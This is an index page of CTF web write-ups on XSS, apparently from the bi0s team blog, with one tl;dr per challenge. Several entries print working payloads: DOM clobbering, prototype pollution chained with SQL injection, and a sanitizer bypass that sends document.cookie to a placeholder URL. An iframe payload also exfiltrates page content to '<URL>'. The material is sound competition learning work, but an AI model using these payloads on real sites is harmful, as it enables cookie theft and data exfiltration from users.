Tag: XSS | bi0s

0_CSP - Securinets-Quals 2023

Lu513n

2023-08-07

Web

tl;dr

CRLF Injection in Headed Key in Werkzeug headers.set
Using CRLF Injection at /?user= to Get XSS at /helloworld
Make the admin visit /?user=<PAYLOAD> and /helloworld using cache poison or bug in regex(uninteded)

NarutoKeeper - Securinets CTF Quals 2022

ma1f0y

2022-04-14

Web

tl;dr

Create a note with meta redirect tag to get callback.
Leak the flag using search functionality.

XSS CSP SecurinetsCTFQuals XS-Leak

Shisui - Fword CTF 2021

Yadhu Krishna M

2021-08-30

Web Exploitation

tl;dr

XSS using DOM Clobbering
<a id="showInfos"></a><a id="SETTINGS" name=check data-timezone="aaa" data-location="eval(window.name)"><a id="SETTINGS" name="x">
Bypass CSRF protection to execute XSS and read flag.

FwordCTF XSS DOM Clobbering

Notepad Series - InCTF Internationals 2021

Az3z3l

2021-08-16

Web Exploitation

tl;dr

Notepad 1 - Use Set-Cookie header to get XSS on the Admin
Notepad 1.5 - CRLF on the name parameter of Golang’s Header().Set() method
Notepad 2 - Xsleaks using Timing-Allow-Origin header

InCTFi CRLF XSS Xsleaks

MD-Notes - InCTF Internationals 2021

Yadhu Krishna M

2021-08-14

Web Exploitation

tl;dr

Leak admin’s hash using wildcard target origin in postMessage or by calculating sha256('').
Create an XSS payload to read /api/flag and send it to attacker server.

InCTFi XSS JavaScript

Jason - Angstrom CTF 2021

Az3z3l

2021-04-08

Web Exploitation

tl;dr

Intended: Append ; secure; samesite=none to cookie. Now, <script src="https://jason.2021.chall.actf.co/flags?callback=load"></script> would retrieve the flag.
Unintended: Append .actf.co as domain to cookie using CSRF -> Setup a xss payload in reaction.py challenge -> Log in to this using CSRF -> Payload in Reaction.py exfiltrates document.cookie

AngstromCTF XSS CSRF Cookies

Web IDE - DiceCTF 2021

Yadhu Krishna M

2021-02-09

Web Exploitation

tl;dr

Unintended Solution: Cookie Path Restriction bypass using pop-up windows + JS Sandbox Escape
Intended Solution: Service Workers + JS Sandbox Escape

XSS DiceCTF JavaScript Sandbox Escape

Build A Better Panel - Dice CTF 2021

Az3z3l

2021-02-09

Web Exploitation

tl;dr

Payload: {"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='/admin/debug/add_widget?panelid=star7rix&widgetname=test123&widgetdata=%27%29%2C%28%27star7rix%27%2C+%28select+flag+from+flag%29%2C+%27%7B%22type%22%3A%22test123%22%7D%27%29+--'></script>\"}}"}

XSS Prototype Pollution CSP DiceCTF

SafeHTMLPaste - Google CTF 2020

Az3z3l

2020-08-26

Web Exploitation

tl;dr

Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e

GoogleCTF XSS WYSIWYG Closure Library sanitizer

XQLi - InCTF Internationals 2020

Az3z3l

2020-08-26

Web Exploitation

tl;dr

SQLi - lcase('inKypinKy')id from dual
Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")

InCTFi XSS CSRF SQLi docker-ssrf